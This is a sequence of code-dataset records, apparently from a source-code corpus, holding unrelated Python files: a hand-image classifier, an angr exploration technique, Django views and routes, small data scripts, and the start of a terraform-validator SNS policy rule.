else:\n similarity_dict[input_images[i].image_id].append(img_sim)\n\n # Sort the similarity graph (dictionary)\n for key, val in similarity_dict.items():\n similarity_dict[key] = sorted(val, key = lambda x: x.similarity, reverse = True)\n # chose the top k related images\n similarity_dict[key] = similarity_dict[key][:k]\n\n # Normalize the values to sum of 1\n\n\n # print the k similar images\n # for k,v in similarity_dict.items():\n # print('Image ID: ', k)\n # for i in v:\n # print(i.image_id, i.similarity)\n # print('\\n')\n\n return similarity_dict\n\n\ndef dimension_reduction_sift(X, k, selected_model, dim_reduction_tech, input_images):\n model = get_feature_model(selected_model)\n dim_reduction_model = get_dim_reduction_tech(dim_reduction_tech)\n\n top_dim = 50\n\n # PCA\n # if dim_reduction_tech == \"1\":\n # pca = PCA(n_components = top_dim)\n # X = np.array(X)\n # U = pca.fit_transform(X)\n # latent_features = U[:, 
:top_dim]\n #\n # # SVD\n # elif dim_reduction_tech == \"2\":\n # # U, _, V = np.linalg.svd(X)\n # svd = TruncatedSVD(n_components=top_dim)\n # U = svd.fit_transform(np.array(X))\n # latent_features = U[:, :top_dim]\n\n # STORE THE SIMILARITY DICT IN H5py or pickle object beforehand\n # Find the similarity\n similarity_dict = {}\n # lf_len = len(latent_features)\n # input_images += training_input_images\n\n bf = cv.BFMatcher()\n for i in range(len(input_images)):\n des1 = X[i]\n for j in range(len(input_images)):\n if input_images[i].image_id == input_images[j].image_id:\n continue\n\n des2 = X[j]\n matches = bf.knnMatch(des1, des2, k=2)\n good_count = 0\n for m, n in matches:\n # Apply ratio test\n if m.distance < 0.85 * n.distance:\n # good.append([m])\n good_count += 1\n\n img_sim = ImageSimilarity(input_images[j].image_id, good_count)\n\n if input_images[i].image_id not in similarity_dict:\n similarity_dict[input_images[i].image_id] = [img_sim]\n else:\n similarity_dict[input_images[i].image_id].append(img_sim)\n\n # Sort the similarity graph (dictionary)\n for key, val in similarity_dict.items():\n similarity_dict[key] = sorted(val, key=lambda x: x.similarity, reverse=True)\n # similarity_dict[key] = sorted(val, key = lambda x: x.similarity)\n # chose the top k related images\n similarity_dict[key] = similarity_dict[key][:k]\n\n return similarity_dict\n\n\n# Dimensionality reduction for Decision Tree Classifier\ndef reduce_dimensions_dt(X, k, dim_red_tech):\n\n if dim_red_tech == 1:\n pca = PCA(n_components=k)\n X_reduced = pca.fit_transform(X)\n return X_reduced\n elif dim_red_tech == 2:\n svd = TruncatedSVD(n_components=k)\n X_reduced = svd.fit_transform(np.array(X))\n return X_reduced\n\n\ndef ppr(similarity_dict, images, K):\n related_images = []\n weights = []\n personalize = []\n image_id_map = {}\n temp = 0\n for k, v in similarity_dict.items():\n image_id_map[k] = temp\n temp += 1\n\n for k, v in similarity_dict.items():\n found = False\n for j in images:\n if j.image_id == k:\n personalize.append(1/(len(images)))\n found = True\n break\n if not found :\n personalize.append(0)\n\n for i in v:\n edge = []\n edge.append(image_id_map[k])\n edge.append(image_id_map[i.image_id])\n related_images.append(edge)\n weights.append(i.similarity)\n # print('\\n')\n A = np.array(related_images)\n weights = np.array(weights)\n G = sparse.csr_matrix((weights, (A[:, 0], A[:, 1])), shape=(len(similarity_dict), len(similarity_dict)))\n personalize = np.array(personalize)\n # pr = pagerank.pagerank_power(G, p=0.85, personalize=personalize, tol=1e-6, max_iter=200)\n pr = pagerank.personalizedPageRank(G, personalize, c=0.15, allowedDiff=1e-9, maxIters=200)\n pr_sorted = np.argsort(pr)\n pr_sorted = pr_sorted[::-1]\n\n img_ppr = []\n # print('\\nPersonalized Page ranking are:\\n-------------------------------------------')\n\n for t in range(0, K):\n id = pr_sorted[t]\n score = pr[id]\n for image_id, node_id in image_id_map.items():\n if node_id == id:\n # no need to print score for the image\n # print('\\n')\n # print('Image ID ' + str(t + 1) + ': ' + image_id + ' : ' + str(score))\n\n # Store the information to display it using matplot\n temp = [image_id, score]\n img_ppr.append(temp)\n return img_ppr\n\n\ndef polynomial_kernel(x1,x2,p =3):\n return (1 + np.dot(x1, x2)) ** p\n\n\ndef rbf_kernel(x1,x2):\n return np.exp(-0.5*np.sum((x1-x2)**2))\n\n\ndef run_task():\n np.random.seed(81)\n\n # TODO: changing this will impact other classifiers so should be used with respect to classifier\n # 
selected_model = choose_feature_model()\n selected_model = \"1\"\n # dim_reduction_tech = choose_dim_reduction_tech()\n dim_reduction_tech = \"1\"\n classifier_type = choose_classifier()\n \n folder_path, dataset_type = input_data_set_folder_path(task=4)\n training_folder_path = input_data_set_folder_path(type='training')\n\n if dataset_type == 1:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'labelled_set1.csv')\n elif dataset_type == 2:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'labelled_set2.csv')\n elif dataset_type == 3:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'unlabelled_set1.csv')\n elif dataset_type == 4:\n labelled_file = os.path.join(CURRENT_DIR, '..' + os.sep, 'Inputs' + os.sep + 'unlabelled_set2.csv')\n\n print(\"\\nTraining the classifier...\")\n\n # TODO: add SVM classifier code\n if classifier_type == \"1\":\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n test_image_feature_model = SIFT(training_folder_path)\n test_input_images = test_image_feature_model.get_data_set_files()\n test_feature_matrix = test_image_feature_model.extract_feature_feature_vectors2()\n\n label_image_feature_model = SIFT(folder_path)\n label_input_images = label_image_feature_model.get_data_set_files()\n feature_matrix = label_image_feature_model.extract_feature_feature_vectors2()\n model = get_feature_model(selected_model)\n top_dim = 50\n svd = TruncatedSVD(n_components=top_dim)\n svd.fit(np.array(feature_matrix))\n U = svd.transform(np.array(feature_matrix))\n latent_features = U[:, :top_dim]\n test_feature_matrix_reduced = svd.transform(np.array(test_feature_matrix))\n latent_features_unlabelled = test_feature_matrix_reduced[:,:top_dim]\n labels = []\n meta_deta = pd.read_csv(os.path.join(CURRENT_DIR, '..' 
+ os.sep, 'Metadata', 'HandInfo.csv')) #This needs to change to take the input from the labelled set in the input folder\n\n test_labels = []\n for i in range(len(latent_features)):\n img_id = label_input_images[i].image_id\n aspect = meta_deta[meta_deta['imageName']=='Hand_'+img_id+'.jpg']['aspectOfHand'].iloc[0]\n if 'palmar' in aspect: #Palmar is 1 and Dorsal is -1\n labels.append(1)\n else:\n labels.append(-1)\n\n for i in range(len(test_input_images)):\n img_id = test_input_images[i].image_id\n aspect = meta_deta[meta_deta['imageName']=='Hand_'+img_id+'.jpg']['aspectOfHand'].iloc[0]\n if 'palmar' in aspect: #Palmar is 1 and Dorsal is -1\n test_labels.append(1)\n else:\n test_labels.append(-1)\n \n labels = np.array(labels)\n C = 10\n X = latent_features\n n = X.shape[0] #len(X)\n K = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n K[i][j] = labels[i] * labels[j] * polynomial_kernel(X[i], X[j])\n P = cvxopt_matrix(K)\n q = cvxopt_matrix(np.ones(n) * -1)\n A = labels.reshape((1, n))\n A = cvxopt_matrix(A.astype('double'))\n # A = matrix(y, (1, n), tc='d')\n b = cvxopt_matrix(0, tc='d')\n temp1 = np.identity(n) * -1\n temp2 = np.identity(n)\n G = cvxopt_matrix(np.vstack((temp1, temp2)))\n temp3 = cvxopt_matrix(np.zeros(n))\n temp4 = cvxopt_matrix(np.ones(n) * C)\n h = cvxopt_matrix(np.vstack((temp3, temp4)))\n cvxopt_solvers.options['show_progress'] = False\n solution = cvxopt_solvers.qp(P, q, G, h, A, b)\n alphas = np.array(solution['x']).reshape(n)\n support_vectors = np.where(alphas > 1e-7)[0][0]\n b = labels[support_vectors] - sum(alphas * labels * polynomial_kernel(X, X[support_vectors]))\n predict = np.zeros(len(latent_features_unlabelled))\n\n for i in range(len(latent_features_unlabelled)):\n asum = 0\n vector = latent_features_unlabelled[i]\n asum = sum(alphas*labels*polynomial_kernel(latent_features,vector)) + b\n predict[i] = np.sign(asum)\n results = predict\n \n tp = 0\n\n print(\"\\nLabeling unlabelled images...\")\n print(\"\\nImage ID : Label\")\n for i in range(len(results)):\n # if i <= 50 and results[i] == -1 :\n if results[i] == test_labels[i] :\n tp +=1\n # elif i > 50 and results[i] == 1 :\n # tp +=1\n img_id = test_input_images[i].image_id\n if results[i] == -1:\n print(img_id+ ' : Dorsal')\n elif results[i] == 1:\n print(img_id + ' : Palmar')\n \n print('\\nClassifier Accuracy: ' + str((tp / 100) * 100))\n\n #################################### DECISION TREE ##############################################\n elif classifier_type == \"2\":\n labelled_set = folder_path[-1]\n unlabelled_set = training_folder_path[-1]\n\n # INPUT FOLDERS & METADATAS\n labelled_folder_path = os.path.join(CURRENT_DIR, '..' + os.sep,\n 'Inputs', 'Labelled', 'Set' + labelled_set)\n labelled_metadata_path = os.path.join(CURRENT_DIR, '..' + os.sep,\n 'Inputs', 'labelled_set' + labelled_set + '.csv')\n labelled_metadata = pd.read_csv(labelled_metadata_path, index_col = \"id\")\n\n unlabelled_folder_path = os.path.join(CURRENT_DIR, '..' 
+ os.sep,\n 'Inputs', 'Unlabelled', 'Set ' + unlabelled_set)\n\n # LABELLED\n\n print('Training Decision Tree Classifier ...')\n\n labelled_feature_model = FeatureModel(labelled_folder_path)\n labelled_images = labelled_feature_model.get_data_set_files()\n\n target = []\n\n for image in labelled_images:\n aspect = \\\n labelled_metadata[labelled_metadata['imageName'] == 'Hand_' + image.image_id + '.jpg'][\n 'aspectOfHand'].iloc[0]\n if 'palmar' in aspect:\n target.append(1)\n if 'dorsal' in aspect:\n target.append(0)\n\n labelled_feature_model = ColorMoment(labelled_folder_path)\n\n feature_matrix = labelled_feature_model.extract_feature_feature_vectors_list(labelled_images)\n\n X = np.array(feature_matrix)\n y = np.array(target)\n X_reduced = reduce_dimensions_dt(X, 20, 2)\n\n clf = DecisionTreeClassifier(max_depth = 5)\n clf.fit(X_reduced, y)\n\n print('Training Decision Tree Classifier ... DONE.')\n\n # UNLABELLED\n\n print('Classifying unlabelled images...')\n\n unlabelled_feature_model = FeatureModel(unlabelled_folder_path)\n unlabelled_images = unlabelled_feature_model.get_data_set_files()\n\n unlabelled_feature_model = ColorMoment(unlabelled_folder_path)\n\n unlabelled_feature_matrix = unlabelled_feature_model.extract_feature_feature_vectors_list(unlabelled_images)\n X_unlabelled = np.array(unlabelled_feature_matrix)\n X_unlabelled_reduced = reduce_dimensions_dt(X_unlabelled, 20, 2)\n\n predictions = clf.predict(X_unlabelled_reduced)\n aspect_dict = {}\n\n # Used to calculate accuracy of the classification\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n hits = 0\n\n for image, prediction in zip(unlabelled_images, predictions):\n\n if prediction == 0:\n aspect_dict[image.image_id] = 'dorsal'\n if image.image_id in dorsal_images:\n hits += 1\n else:\n aspect_dict[image.image_id] = 'palmar'\n if image.image_id in palmar_images:\n hits += 1\n\n print(f'{image.image_id} : {aspect_dict[image.image_id]}')\n\n print('Classifying unlabelled images... 
DONE.')\n\n accuracy = (hits / len(unlabelled_images)) * 100\n print(f'\\nAccuracy = {accuracy}%')\n\n OUTPUT_PATH = os.path.join(OUTPUT_DIR,\n 'DT_labelledset' + labelled_set +\n '_unlabelledset' + unlabelled_set +\n '.csv')\n\n with open(OUTPUT_PATH, 'w', newline = \"\") as csv_file:\n writer = csv.writer(csv_file)\n for key, value in aspect_dict.items():\n writer.writerow([key, value])\n\n print('(ImageID,AspectOfHand) info saved in file - ', OUTPUT_PATH)\n\n # PPR based classifier code\n elif classifier_type == \"3\":\n # k = int(input('Enter the value of k (outgoing edges): '))\n # for cm + pca\n # k = 12\n k = 18\n lsh_index = lsh.LSHIndex(load_sift=True)\n\n if selected_model == \"1\":\n unlabelled_image_feature_model = ColorMoment(training_folder_path)\n unlabelled_input_images = unlabelled_image_feature_model.get_data_set_files()\n unlabelled_feature_matrix = unlabelled_image_feature_model.extract_feature_feature_vectors()\n\n # Dorsal\n dor_image_feature_model = ColorMoment(folder_path, image_label=ImageLabel.DORSAL,\n labelled_file=labelled_file)\n dor_input_images = dor_image_feature_model.get_data_set_files()\n dor_feature_matrix = dor_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X1 = np.array(dor_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_dor = dimension_reduction(X1, k, selected_model, dim_reduction_tech,\n # dor_input_images, training_input_images)\n\n # Palmar\n palm_image_feature_model = ColorMoment(folder_path, image_label=ImageLabel.PALMAR,\n labelled_file=labelled_file)\n palm_input_images = palm_image_feature_model.get_data_set_files()\n palm_feature_matrix = palm_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X2 = np.array(palm_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_palm = dimension_reduction(X2, k, selected_model, dim_reduction_tech,\n # palm_input_images,\n # training_input_images)\n\n X = np.array(dor_feature_matrix + palm_feature_matrix + unlabelled_feature_matrix)\n all_images = dor_input_images + palm_input_images + unlabelled_input_images\n # similarity_dict = dimension_reduction(X, k, selected_model, dim_reduction_tech, all_images)\n\n # Using SIFT to find similarity graph before creating the PPR graph\n all_image_features = []\n for image in all_images:\n img_id = image.image_id\n img_feature = []\n img_index = lsh_index.image_id_map[img_id]\n start_point = lsh_index.data_sift_kp_starts[img_index]\n if img_index > len(lsh_index.data_sift_kp_starts):\n img_feature = lsh_index.data_sift[start_point:]\n all_image_features.append(img_feature)\n else:\n end_point = lsh_index.data_sift_kp_starts[img_index + 1]\n img_feature = lsh_index.data_sift[start_point:end_point]\n all_image_features.append(img_feature)\n similarity_dict = dimension_reduction_sift(all_image_features, k, selected_model, dim_reduction_tech,\n all_images)\n # SIFT ends\n\n # PPR\n # print(len(X1))\n dor_img_ppr = ppr(similarity_dict, dor_input_images, len(X))\n palm_img_ppr = ppr(similarity_dict, palm_input_images, len(X))\n\n print(\"\\nLabeling unlabelled images...\")\n print(\"\\nImage ID : Label\")\n dor_score, palm_score = 0, 0\n tp = 0\n # Used to calculate accuracy of the classification\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n\n for i in unlabelled_input_images:\n for j in range(len(dor_img_ppr)):\n if dor_img_ppr[j][0] == 
i.image_id:\n # dor_score = dor_img_ppr[j][1]\n dor_score = j\n break\n\n for j in range(len(palm_img_ppr)):\n if palm_img_ppr[j][0] == i.image_id:\n # palm_score = palm_img_ppr[j][1]\n palm_score = j\n break\n\n # if dor_score > palm_score:\n if dor_score < palm_score:\n print(i.image_id + ' : Dorsal')\n # check for true positive\n if i.image_id in dorsal_images:\n tp += 1\n else:\n print(i.image_id + ' : Palmar')\n # check for true positive\n if i.image_id in palmar_images:\n tp += 1\n\n print('\\nClassifier Accuracy: ' + str((tp / 100) * 100))\n\n elif selected_model == \"3\":\n unlabelled_image_feature_model = HOG(training_folder_path)\n unlabelled_input_images = unlabelled_image_feature_model.get_data_set_files()\n unlabelled_feature_matrix = unlabelled_image_feature_model.extract_feature_feature_vectors()\n\n # Dorsal\n dor_image_feature_model = HOG(folder_path, image_label=ImageLabel.DORSAL,\n labelled_file=labelled_file)\n dor_input_images = dor_image_feature_model.get_data_set_files()\n dor_feature_matrix = dor_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X1 = np.array(dor_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_dor = dimension_reduction(X1, k, selected_model, dim_reduction_tech,\n # dor_input_images, training_input_images)\n\n # Palmar\n palm_image_feature_model = HOG(folder_path, image_label=ImageLabel.PALMAR,\n labelled_file=labelled_file)\n palm_input_images = palm_image_feature_model.get_data_set_files()\n palm_feature_matrix = palm_image_feature_model.extract_feature_feature_vectors()\n # we have combined features matrix with dorsal, palmar, and ulabelled, so no longer used\n X2 = np.array(palm_feature_matrix + unlabelled_feature_matrix)\n # similarity_dict_palm = dimension_reduction(X2, k, selected_model, dim_reduction_tech,\n # palm_input_images,\n # training_input_images)\n\n X = np.array(dor_feature_matrix + palm_feature_matrix + unlabelled_feature_matrix)\n all_images = dor_input_images + palm_input_images + unlabelled_input_images\n similarity_dict = dimension_reduction(X, k, selected_model, dim_reduction_tech, all_images)\n\n # PPR\n # print(len(X1))\n dor_img_ppr = ppr(similarity_dict, dor_input_images, len(X))\n palm_img_ppr = ppr(similarity_dict, palm_input_images, len(X))\n\n print(\"\\nLabeling unlabelled images...\")\n print(\"\\nImage ID : Label\")\n dor_score, palm_score = 0, 0\n tp = 0\n # Used to calculate accuracy of the classification\n dorsal_images, palmar_images = get_dorsal_palmar_images()\n\n for i in unlabelled_input_images:\n for j in range(len(dor_img_ppr)):\n if dor_img_ppr[j][0] == i.image_id:\n # dor_score = dor_img_ppr[j][1]\n dor_score = j\n break\n\n for j in range(len(palm_img_ppr)):\n if palm_img_ppr[j][0] == i.image_id:\n # palm_score = palm_img_ppr[j][1]\n palm_score = j\n break\n\n # if dor_score > palm_score:\n if dor_score < palm_score:\n print(i.image_id + ' : Dorsal')\n # check for true positive\n if i.image_id in dorsal_images:\n tp += 1\n else:\n print(i.image_id + ' : Palmar')\n # check for true positive\n if i.image_id in palmar_images:\n tp += 1\n\n print('\\nClassifier Accuracy: ' + str((tp / 100) * 100))\n\n\nif __name__ == \"__main__\":\n run_task()","sub_path":"Code/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":29578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"394553993","text":"#!/usr/bin/env 
python\n\"\"\"\n\"\"\"\nfrom optparse import OptionParser\nimport json\n\n\ndef convert_to_txt(inpath, indir, outpath):\n with open(outpath, \"w\") as of:\n of.write(\"Reading inpath...\\n\")\n of.write(\"inpath: %s\\n\"%(inpath,))\n of.write(\"indir: %s\\n\"%(indir,))\n with open(inpath, \"r\") as json_file:\n data = json.load(json_file)\n files = data[\"files\"]\n of.write(\"files:\\n\")\n for f in files:\n of.write(\"%s\\n\"%(f[\"basename\"]))\n parts = data[\"parts\"]\n of.write(\"\\n\")\n of.write(\"parts:\\n\")\n for name in parts:\n part = parts[name]\n of.write(\"reads %s mapping %s\\n\"%(part[\"reads\"], part[\"mapping\"]))\n\n \nif __name__ == \"__main__\":\n \"\"\"\n \"\"\"\n parser = OptionParser(usage=__doc__, version=\"%prog 0.01\")\n parser.add_option(\"-o\",\"--outpath\",dest=\"outpath\",\n help=\"output file path\", default = 'fakeped')\n parser.add_option(\"-p\",\"--indir\",dest=\"indir\",\n help=\"path for input files\", default = './')\n parser.add_option(\"-i\", \"--inpath\", dest=\"inpath\",\n help=\"path for input primary file\", default=\"./\")\n (options,args) = parser.parse_args()\n convert_to_txt(options.inpath, options.indir, options.outpath)\n\n\n \n","sub_path":"tools/globus/read_cga_dataset.py","file_name":"read_cga_dataset.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"528755182","text":"import pyvex\nimport claripy\nimport simuvex\nimport functools\n\nimport logging\nl = logging.getLogger(\"angr.exploration_techniques.Oppologist\")\n\nfrom ..errors import AngrError\nexc_list = (AngrError, simuvex.SimError, claripy.ClaripyError, TypeError, ValueError, ArithmeticError, MemoryError)\n\nfrom . import ExplorationTechnique\nclass Oppologist(ExplorationTechnique):\n \"\"\"\n The Oppologist is an exploration technique that forces uncooperative code through qemu.\n \"\"\"\n\n def __init__(self):\n ExplorationTechnique.__init__(self)\n\n @staticmethod\n def _restore_path(old, new):\n new.state.release_plugin('unicorn')\n new.state.register_plugin('unicorn', old.state.unicorn.copy())\n new.state.options = set(old.state.options)\n return new\n\n def _oppologize(self, p, pn, **kwargs):\n l.debug(\"... pn: %s\", pn)\n\n irsb = self.project.factory.block(pn.addr).vex\n addrs = [ s.addr for s in irsb.statements if isinstance(s, pyvex.IRStmt.IMark) ]\n if len(addrs) > 1:\n stops = [ addrs[1] ]\n else:\n stops = None\n\n pn.state.options.add(simuvex.options.UNICORN)\n pn.state.options.add(simuvex.options.UNICORN_AGGRESSIVE_CONCRETIZATION)\n pn.state.unicorn.max_steps = 1\n pn.state.unicorn.countdown_symbolic_registers = 0\n pn.state.unicorn.countdown_symbolic_memory = 0\n pn.state.unicorn.countdown_nonunicorn_blocks = 0\n pn.step(extra_stop_points=stops, throw=True, **kwargs)\n\n fixup = functools.partial(self._restore_path, p)\n\n l.debug(\"... 
successors: %s\", pn.successors)\n\n return (\n map(fixup, [ pp for pp in pn.successors if not pp.errored ]),\n map(fixup, pn.unconstrained_successors),\n map(fixup, pn.unsat_successors),\n [ ], # pruned\n map(fixup, [ pp for pp in pn.successors if pp.errored ]), #errored\n )\n\n @staticmethod\n def _combine_results(*results):\n all_successors = [ ]\n all_unconstrained = [ ]\n all_unsat = [ ]\n all_pruned = [ ]\n all_errored = [ ]\n\n for s,uc,us,p,e in results:\n all_successors.extend(s)\n all_unconstrained.extend(uc)\n all_unsat.extend(us)\n all_pruned.extend(p)\n all_errored.extend(e)\n\n return (\n all_successors,\n all_unconstrained,\n all_unsat,\n all_pruned,\n all_errored\n )\n\n def _delayed_oppology(self, p, e, **kwargs):\n try:\n p.step(num_inst=e.executed_instruction_count, throw=True, **kwargs)\n except Exception: #pylint:disable=broad-except\n return [], [], [], [], p.step(num_inst=e.executed_instruction_count, **kwargs)\n\n need_oppologizing = [ pp for pp in p.successors if pp.addr == e.ins_addr ]\n results = [ (\n [ pp for pp in p.successors if pp.addr != e.ins_addr ],\n p.unconstrained_successors,\n p.unsat_successors,\n [ ],\n [ ]\n ) ]\n\n results += map(functools.partial(self._oppologize, p, **kwargs), need_oppologizing)\n return self._combine_results(*results)\n\n def step_path(self, p, **kwargs):\n try:\n p.step(throw=True, **kwargs)\n return None\n except (simuvex.SimUnsupportedError, simuvex.SimCCallError) as e:\n l.debug(\"Errored on path %s after %d instructions\", p, e.executed_instruction_count)\n try:\n if e.executed_instruction_count:\n return self._delayed_oppology(p, e, **kwargs)\n else:\n return self._oppologize(p, p.copy(), **kwargs)\n except exc_list: #pylint:disable=broad-except\n l.error(\"Oppologizer hit an error.\", exc_info=True)\n return None\n except exc_list: #pylint:disable=broad-except\n l.error(\"Original block hit an error.\", exc_info=True)\n return None\n","sub_path":"angr/exploration_techniques/oppologist.py","file_name":"oppologist.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"650974380","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Comment20200904\nfrom .models import Pid8F332Caa60\nimport time\n\nbrands_dic = {\n \"PHILIPS\": 0,\n \"MI\": 0,\n \"SONY\": 0,\n \"HUAWEI\": 0,\n \"Haier\": 0,\n \"Apple\": 0,\n \"SAMSUNG\": 0,\n \"Lenovo\": 0,\n \"HP\": 0,\n \"ASUS\": 0,\n \"Hisense\": 0,\n \"TCL\": 0,\n \"HONOR\": 0,\n \"KONKA\": 0,\n \"GREE\": 0,\n \"CHANGHONG\": 0,\n \"YOUPIN\": 0,\n \"LG\": 0,\n \"Redmi\": 0,\n \"MEIZU\": 0,\n \"RAZER\": 0,\n \"Microsoft\": 0,\n \"Hasee\": 0,\n \"360\": 0,\n \"OPPO\": 0,\n \"vivo\": 0,\n \"BenQ\": 0,\n \"SHARP\": 0,\n \"ZMI\": 0,\n \"ROG\": 0,\n \"other\": 0,\n}\n\n\n\ndef index(request):\n # return HttpResponse(\"Hello Django!\")\n return render(request,'index.html')\n\n\ndef show_today(request):\n n = Comment20200904.objects.all()\n now_day = time.strftime(\"%Y-%m-%d\", time.localtime())\n count = len(n)\n comment_sum = 0\n phone_count_max = 0\n for phone in n:\n comment_sum += int(phone.comment_count)\n\n for key in brands_dic.keys():\n if phone.product_name.find(key) > 0 :\n brands_dic[key] += 1\n break\n else:\n brands_dic['other'] += 1\n\n tmp = brands_dic.copy()\n for key,value in tmp.items():\n if value == 0:\n brands_dic.pop(key)\n continue\n if value > phone_count_max:\n 
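# keep the running maximum per-brand count (ends up in the template context via locals())\n            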
phone_count_max = value\n    # print(phone_count_max,brands_dic)\n    barnds_list = list(brands_dic.keys())\n    barnds_count_list = list(brands_dic.values())\n\n    return render(request,'dayshow.html',locals())\n\n\ndef show_product(request):\n\n    product_comments = Pid8F332Caa60.objects.all()\n    negative_count = 0\n    positive_count = 0\n    for product_comment in product_comments:\n        if float(product_comment.emotional_value) >= 0.5 :\n            positive_count += 1\n        else:\n            negative_count += 1\n    positive_proportion = (round(positive_count /(positive_count + negative_count) * 100))\n    count = len(product_comments)\n    return render(request,'productshow.html',locals())","sub_path":"week10/MyDjango/phone/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"592864382","text":"from django.conf.urls import patterns, include\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'we.views.home', name='home'),\n    # url(r'^blog/', include('blog.urls')),\n    (r'^([^/]+/)?common/', include('common.urls')),\n    (r'^www/', include('apps.www.urls', namespace='www')),\n    (r'^mirror/', include('apps.mirror.urls', namespace='mirror')),\n    (r'^genuine/', include('apps.genuine.urls', namespace='genuine')),\n    (r'^file/', include('apps.file.urls', namespace='file')),\n    (r'^iptv/', include('apps.iptv.urls', namespace='iptv')),\n    (r'^open/', include('apps.open.urls', namespace='open')),\n\n    (r'^me/', include('apps.me.urls', namespace='me')),\n\n    (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"we/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"221642288","text":"# Prior model for judging whether a time series is double-triggered\n\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom numpy import *\n\n\ndef is_double_trigger(data):\n    peak, _ = signal.find_peaks(data, height=30, distance=50)\n    if len(peak) == 2:\n        return True\n    else:\n        return False\n\n\nif __name__ == '__main__':\n    A, X, Z = [], [], []\n    filepath = 'C:\\\\Users\\\\Dell\\\\Desktop\\\\标注结果\\\\第三次标注:202\\\\double_trigger_0-4679.txt'\n    with open(file=filepath, mode='r+', encoding='utf-8') as f:\n        lines = f.readlines()\n        point = 0\n        for line in lines:\n            value = [str(s) for s in line.split('\\t')]\n            X.append(value[0])\n            Z_temp = value[1].split(',')\n            z = []\n            for num in Z_temp:\n                z.append(float(num))\n            Z.append(z)\n        f.close()\n    num = 0\n    for i in range(len(Z)):\n        if is_double_trigger(Z[i]):\n            num += 1\n    print(num)\n    print(len(Z))\n\n# l = len(X)\n# for j in range(l):\n# plt.plot(Z[j], \"k-\", alpha=.3)\n# plt.tight_layout()\n# plt.show()\n#\n    y = Z[1]\n    peaks, _ = signal.find_peaks(y, height=30, distance=50)\n    plt.figure(figsize=(10, 5))\n    plt.plot(y)\n    for i in range(len(peaks)):\n        plt.plot(peaks[i], y[peaks[i]], '.', markersize=10)\n    plt.show()\n","sub_path":"double_trigger.py","file_name":"double_trigger.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"586274191","text":"\n\n\n\n\n\ndef main():\n    file = input(\"Give me a file name: \")\n    inputFile = open(file, \"r\")\n    \n    s = inputFile.readline()\n    \n    sequence = []\n    for v in range (6): \n        a = inputFile.readline()\n        list= [a]\n        sequence = sequence + list\n    \n    for m in range(6): \n        k = sequence[m]\n        smallesterrors = len(s) + 10\n        bestposition = 0\n        
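# slide candidate sequence k along s, counting character mismatches at each offset\n        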
for i in range(0,len(s)-len(k)): \n errors = 0\n for j in range(len(k)-2): \n if s[i+j] != k[j%len(k):(j+1)%len(k)]:\n errors = errors + 1\n if errors < smallesterrors: \n smallesterrors = errors\n bestposition = i\n print(\"Sequence\", m+1, \"has\",smallesterrors, \"errors at position\", bestposition)\n \nmain()","sub_path":"testFiles/match/match70.py","file_name":"match70.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"70509745","text":"'''\nCreated on Feb 27, 2014\n\n@author: miguel\n'''\ndef drawMap(routeList):\n paintRoute=\"\";\n noDuplirouteList= set(routeList)\n for route in noDuplirouteList:\n paintRoute+=route.origin+\"-\"+route.dest+\",\"\n import webbrowser\n webbrowser.open('http://www.gcmap.com/mapui?P='+paintRoute) ","sub_path":"Assignment2.1/src/csAir/DrawMap.py","file_name":"DrawMap.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"502755992","text":"from __future__ import absolute_import, division, print_function\nimport inspect\nimport sys\nfrom builtins import (str)\nfrom terraform_validator.custom_rules.BaseRule import BaseRule\n\n\ndef lineno():\n \"\"\"Returns the current line number in our program.\"\"\"\n return str(' - SnsTopicPolicyNotPrincipalRule - caller: ' + str(inspect.stack()[1][3]) + ' - line number: ' + str(\n inspect.currentframe().f_back.f_lineno))\n\n\nclass SnsTopicPolicyNotPrincipalRule(BaseRule):\n\n def __init__(self, cfn_model=None, debug=None):\n '''\n Initialize\n :param cfn_model:\n '''\n BaseRule.__init__(self, cfn_model, debug=debug)\n\n def rule_text(self):\n '''\n Get rule text\n :return:\n '''\n if self.debug:\n print('rule_text' + lineno())\n return 'SNS Topic policy should not allow Allow+NotPrincipal'\n\n def rule_type(self):\n '''\n Get rule type\n :return:\n '''\n self.type = 'VIOLATION::FAILING_VIOLATION'\n return 'VIOLATION::FAILING_VIOLATION'\n\n 